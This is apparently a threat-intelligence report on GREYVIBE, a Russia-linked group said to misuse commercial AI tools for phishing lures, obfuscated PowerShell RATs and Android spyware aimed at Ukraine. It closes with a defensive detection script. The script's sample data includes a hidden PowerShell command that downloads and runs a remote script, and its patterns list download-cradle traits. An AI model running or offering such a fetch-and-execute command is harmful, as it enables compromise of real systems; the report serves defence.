New Russia-Linked Threat Actor Uses AI to Supercharge Multi-Vector Attacks Against Ukraine
What security teams, threat intelligence analysts, and executive leadership need to know about GREYVIBE and the AI-enabled threat playbook being refined against Ukrainian targets today.
Executive Summary
GREYVIBE is a newly identified Russia-linked threat cluster conducting persistent, AI-enabled espionage operations against Ukrainian military, government, civilian, and business targets since at least August 2025. The group operates in the grey zone between financially motivated cybercrime and state-aligned intelligence work, systematically weaponizing commercial AI platforms to design lures, generate malware, build infrastructure, and script post-compromise activity.
GREYVIBE runs at least five parallel attack chains (PhantomMail, PhantomClick, PrincessClub, DroneLink, and Nebo) that all ultimately deliver the custom remote access tools PhantomRelay and LegionRelay, and the FallSpy Android spyware, into high-value Ukrainian environments. Despite heavy AI use, the cluster exhibits repeated operational security mistakes that have exposed its tooling and tradecraft, including a design flaw in the LegionRelay/DroneLink infrastructure that gave defenders direct insight into backend activity.
Entities tied to Ukraine, and more broadly any organization that Russia regards as an adversary, should treat GREYVIBE's techniques and AI playbook as a preview of near-term threats to come.
1 Who Is GREYVIBE?
Identity, Alignment, and "Vibe Coding"
GREYVIBE is assessed as a Russian-speaking, Russia-nexus threat group whose activity aligns closely with Kremlin intelligence priorities but does not currently meet strict criteria for a formal state advanced persistent threat designation. Researchers link the group to Russian time zones, Russian-language admin panels and code comments, and victimology that tracks directly with Russian strategic interest in Ukrainian military and government assets.
The cluster name reflects both its operating position in the grey space between cybercrime and state activity and its disciplined approach to "vibe coding" operations: lures, infrastructure, and malware are consistently dressed in believable themes that match the emotional and contextual character of each target set, from government email to adult entertainment to drone charities. Rather than one monolithic campaign, GREYVIBE codes each operation's look, feel, and user experience to the environment it is impersonating, then uses AI to scale that aesthetic and narrative across emails, websites, chat personas, and voice or video deepfakes.
Attribution assessments from multiple vendors converge on the view that GREYVIBE is best understood as a Kremlin-aligned cybercrime crew or contractor that monetizes some access through crypto-mining while simultaneously conducting targeted intelligence collection. The presence of XMRig miners on selected victims, along with operational overlaps with TrickBot and UAC-0098 infrastructure and tooling, points to heritage in the broader Russian cybercrime ecosystem rather than a cleanly separated state unit.
Victimology
Victimology is centered on Ukraine and Ukraine-related organizations, with confirmed targeting of military personnel, government agencies, critical infrastructure, and private-sector firms, as well as Ukrainian diaspora and humanitarian ecosystems. Notably, PrincessClub-linked lures have pulled in active-duty Ukrainian combatants, and Nebo operations appear tailored to trick Ukrainian users into interacting with interfaces masquerading as Russian military communications portals.
2 How GREYVIBE Weaponizes AI
AI Across the Entire Attack Lifecycle
A defining characteristic of GREYVIBE is its systematic use of commercial generative AI platforms such as ChatGPT, Google Gemini, and Ideogram AI across nearly every phase of its operations. Metadata and development artifacts associated with the PhantomMail, PhantomClick, PrincessClub, DroneLink, and Nebo campaigns show that AI tools were used to draft spear-phishing content, generate website copy, create imagery, write and refactor malware, and even assist with backend infrastructure scripting.
In lure development, GREYVIBE operators rely on LLMs to produce native-sounding, institutionally plausible Ukrainian and Russian-language emails, web content, and chat messages tailored to government, military, and civilian audiences. Ideogram and similar image tools are used to generate convincing logos, interface components, and site layouts that match both Ukrainian government branding and commercial adult or charity aesthetics, without reusing stolen assets that could raise suspicion.
On the technical side, AI support is evident in GREYVIBE's four custom obfuscators: LOOKVALPS and DAYLIGHT for PowerShell payloads, and LOOKVALJS and TEASOUP for JavaScript. Code patterns, comment styles, and transformation logic in these obfuscators resemble AI-generated script behaviors, including non-idiomatic variable naming and redundant logic structures that are typical of LLM-assisted code. This use of AI helps the group generate polymorphic variants that drift away from known signature patterns and static YARA rules, complicating conventional detection pipelines.
Advantages and Exposed Weaknesses
GREYVIBE's heavy AI dependency gives it three major advantages: it bridges skill gaps for less experienced operators, accelerates development cycles, and enables faster mutation of lures and code to evade behavioral and signature-based detections. Lower-skilled crew members can stand up multiple parallel campaigns using AI-assisted code and content, which in turn allows the group to sustain five distinct attack chains with relatively modest human resources.
In the DroneLink campaign, flaws in the LegionRelay implementation, including misconfigured access controls and exposed endpoints, allowed defenders to observe backend activity and retrieve artifacts that dramatically improved understanding of the group's operations. These errors appear consistent with AI-assisted code that was never subjected to rigorous manual review, illustrating how AI can create an illusion of robustness while masking subtle but critical security oversights on the attacker side.
This pattern aligns with broader industry observations that as threat actors lean on generative AI to generate or refactor code, they often skip deep testing and threat modeling, leaving latent bugs, misconfigurations, or information leaks that defenders can later weaponize.
3 Campaign Overview and Tradecraft
GREYVIBE does not rely on a single vector. Instead, it orchestrates multiple concurrent delivery chains that all converge on shared malware infrastructure.
Campaign Matrix
| Campaign | Primary Vector | Key Payloads / Tools | Notable Features |
|---|---|---|---|
| PhantomMail | Spear-phishing emails with ZIP/RAR via cloud links (Google Drive, 4sync) impersonating Ukrainian officials and agencies | PyInstaller and JavaScript loaders, PhantomRelay PowerShell RAT | Classic government-themed lures; collection on military, government, and business users across Ukraine |
| PhantomClick | Fake CAPTCHA and ClickFix-like verification pages mimicking Zoom and other services | PhantomRelay, PowerShell-based loaders | Users execute commands from fake Cloudflare or verification prompts, then get redirected to legitimate sites to minimize suspicion |
| PrincessClub | Fraudulent Ukrainian "adult club" websites plus dating and Telegram chat lures | PhantomRelay; FallSpy Android spyware for mobile targets | Targets include Ukrainian military personnel in Kharkiv; adult-themed chatbots and WebRTC calls with AI-generated female avatars capturing audio and video |
| DroneLink | Fake charitable foundations claiming to supply FPV drones and UAV support for Ukrainian forces | LegionRelay scripts sharing C2 with PrincessClub, XMRig miner on some hosts | Design flaw in LegionRelay exposed backend functionality, revealing post-compromise activity and tooling |
| Nebo | Counterfeit Russian military communication login portals aimed at Ukrainian users | LegionRelay and FallSpy, along with credential-harvesting web components | Likely designed to entice Ukrainian personnel seeking or testing access to Russian systems, thereby revealing credentials and devices |
Across these campaigns, PhantomRelay and LegionRelay function as the primary post-compromise PowerShell RATs, offering capabilities including system fingerprinting, browser credential theft, dynamic script loading, screenshot capture, data exfiltration, and RDP setup. FallSpy, an Android-focused spyware, is deployed in PrincessClub and Nebo to harvest contacts, call logs, GPS location, SIM data, media files, and device identifiers from mobile devices associated with priority targets.
GREYVIBE's multi-vector delivery strategy mirrors a marketing funnel: email, web, mobile, and chat all serve as entry points feeding into a unified malware and C2 infrastructure designed to scale collection across diverse target sets.
4 AI in the Broader Cybercrime Ecosystem
GREYVIBE is part of a wider trend in which both state-aligned and criminal actors use AI across all stages of the attack lifecycle, from reconnaissance to monetization. Over the past two years, security vendors and cloud providers have documented threat actors using commercial and underground large language models to generate phishing content, translate and localize lures, write or obfuscate malware, and automate post-exploitation tasks such as data triage and crypto-asset movement.
Deepfake voice and video tools have already been abused to impersonate executives and trusted contacts for high-value social engineering, causing multi-million-dollar fraud losses in corporate environments. Similarly, AI can rapidly re-skin existing malware families to evade static detection, while automated scraping and analysis of open-source data allows actors to profile targets at a speed and scale far beyond manual OSINT.
GREYVIBE illustrates how even mid-tier operators can use off-the-shelf AI services to manage a portfolio of campaigns that would previously have required significantly more developer capacity. As more groups imitate this model, defenders should expect an increase in campaign volume, personalization, and code churn, coupled with a decline in easily recognizable stylistic fingerprints that historically underpinned attribution and clustering.
5 30/60/90-Day Outlook for AI-Enabled Threats
Next 30 Days: Integration and Scaling
Most criminal and state-aligned actors are likely to integrate AI incrementally into existing workflows. Expect expanded use of AI to refresh phishing content, localize lures into additional languages, modify existing malware to bypass updated signatures, and generate infrastructure-as-code templates for disposable C2 and phishing infrastructure.
60 Days: Obfuscation, Mobile, and Defensive AI
More groups are expected to build custom obfuscators and polymorphic loaders that continually morph code presentation while preserving behavior. Mobile targeting will intensify as AI tooling makes it easier to adapt malware and phishing content to Android and iOS ecosystems, echoing GREYVIBE's deployment of FallSpy.
90 Days: Attribution Shock and Intelligence Gaps
Broad adoption of AI for code and content regeneration is likely to erode traditional attribution methodologies based on linguistic cues, coding style, and repeated visual branding, creating an attribution shock for the intelligence community. Organizations will need to prioritize resilience and behavioral detection over actor-specific signatures.
6 Implications and Recommendations
Why GREYVIBE Matters Beyond Ukraine
While GREYVIBE currently focuses on Ukraine and Ukraine-related entities, its tactics, tooling, and AI playbook are highly portable to other theaters and target sets. Russian-aligned cybercrime groups have a pattern of first honing capabilities against Ukrainian targets, then repurposing them against broader Western adversaries, as seen in historical TrickBot and UAC-0098 activity.
At the same time, GREYVIBE demonstrates that AI-augmented operations are not automatically high-sophistication: the group has made significant operational security mistakes, tested samples in public sandboxes, and occasionally monetized access with noisy tools such as crypto miners.
Priority Defensive Actions
1. Integrate GREYVIBE IOCs and Behavior into Detection
   - Ingest and maintain up-to-date indicators of compromise for GREYVIBE campaigns, including domains, IPs, file hashes, and obfuscator signatures for PhantomRelay, LegionRelay, FallSpy, LOOKVALPS, LOOKVALJS, DAYLIGHT, and TEASOUP.
   - Augment with behavior-based analytics that flag unusual PowerShell command sequences, dynamic script loading, and suspicious web-to-PowerShell execution flows typical of PhantomMail and PhantomClick chains.
2. Harden Email and Web Controls Against Cloud-Delivered Archives and CAPTCHA-Style Lures
   - Review secure email gateway and cloud security posture management rules for handling archives delivered via Google Drive, 4sync, and similar services, ensuring detonation and content inspection of ZIP/RAR files even when hosted on trusted platforms.
   - Deploy user and content controls that highlight or interdict "Click to verify you are not a bot" or Cloudflare-mimicking prompts that request command execution, with tailored user education on ClickFix-style pages.
3. Treat AI-Assisted Threats as a Distinct Intelligence Category
   - Establish tagging in threat intelligence platforms for AI-assisted campaigns, capturing AI tool usage, code artifacts, and characteristic AI-generated patterns as first-class observables.
   - Coordinate with detection engineering to look for AI-authored code anomalies such as repetitive or unnecessary logic, inconsistent naming conventions, and patterns matching known LLM-generated samples.
4. Expand Phishing and Social-Engineering Training to Cover AI-Enabled Scenarios
   - Update awareness content to explicitly address AI-generated deepfakes, ultra-polished multilingual emails, fake charity and adult content sites, and CAPTCHA or verification flows that demand command execution.
   - For high-risk roles such as military, government, and critical infrastructure operators, include specific scenarios modeled on PrincessClub and DroneLink that show how personal communications and patriotic themes can be leveraged for targeting.
5. Monitor for Unusual Post-Compromise Scripting and Infrastructure Patterns
   - Instrument logging to capture detailed PowerShell and scripting telemetry, integrating detections for AI-style batch command structures and generic code comments indicative of LLM involvement.
   - Hunt for backend misconfigurations similar to those exposed in LegionRelay, including unauthenticated or weakly protected endpoints, verbose error messages, and debug interfaces left accessible on attacker infrastructure.
6. Prepare Response Playbooks That Assume AI-Accelerated Campaigns
   - Assume an attacker can regenerate lures and malware in hours, not weeks, and design containment and communication plans accordingly, focusing on closing behavioral gaps rather than chasing one-off indicators.
   - Include guidance for quickly assessing whether AI-assisted operational errors might expose attacker infrastructure or tooling, turning GREYVIBE-style mistakes into repeatable defender advantages.
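A minimal behavioral check of the kind the first and fifth actions call for, written here as an added example (not GREYVIBE tooling or any vendor's detection): it scores process-creation records for PowerShell launched from a browser or the Run box with download-cradle traits, which is the shape of the PhantomClick chain regardless of how the payload is obfuscated. The log records are constructed and the Sysmon-style field names are an assumption.

```python
import re

# Parents a PowerShell process should rarely have on an end-user workstation;
# explorer.exe covers the Win+R "paste and run" step that fake CAPTCHA pages request.
WEB_PARENTS = {"chrome.exe", "msedge.exe", "firefox.exe", "explorer.exe"}

# Command-line traits of a download-and-execute cradle (case-insensitive).
CRADLE_PATTERNS = [
    re.compile(r"-enc(odedcommand)?\b", re.I),
    re.compile(r"invoke-webrequest|iwr|downloadstring|iex|invoke-expression", re.I),
    re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    re.compile(r"https?://", re.I),
]

def score_event(ev: dict) -> tuple:
    """Score one process-creation record; returns (score, reasons)."""
    reasons = []
    image = ev["Image"].rsplit("\\", 1)[-1].lower()
    parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
    if image not in {"powershell.exe", "pwsh.exe"}:
        return 0, reasons
    web_parent = parent in WEB_PARENTS
    if web_parent:
        reasons.append(f"powershell spawned by {parent}")
    hits = [p.pattern for p in CRADLE_PATTERNS if p.search(ev["CommandLine"])]
    reasons.extend(f"cradle trait: {h}" for h in hits)
    # The parent anomaly carries the most weight: a cradle launched from a
    # browser or the Run box is the PhantomClick/ClickFix shape itself.
    return (3 if web_parent else 0) + len(hits), reasons

def detect(events: list, threshold: int = 4) -> list:
    """Return the events scoring at or above threshold, annotated with reasons."""
    flagged = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            flagged.append({**ev, "score": score, "reasons": reasons})
    return flagged

# Constructed sample telemetry (field names follow Sysmon Event ID 1 as an assumption).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -c "iex (iwr https://captcha-check.example.invalid/v.ps1)"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\CCM\CcmExec.exe",
     "CommandLine": 'powershell.exe -NoProfile -c "Invoke-WebRequest http://intranet.example.invalid/health"'},
]
```

Only the first record is flagged (score 6: web parent plus three cradle traits); the scheduled backup scores 0 and the management-agent health check scores 2, below the threshold, which is the point of weighting the parent anomaly over any single keyword.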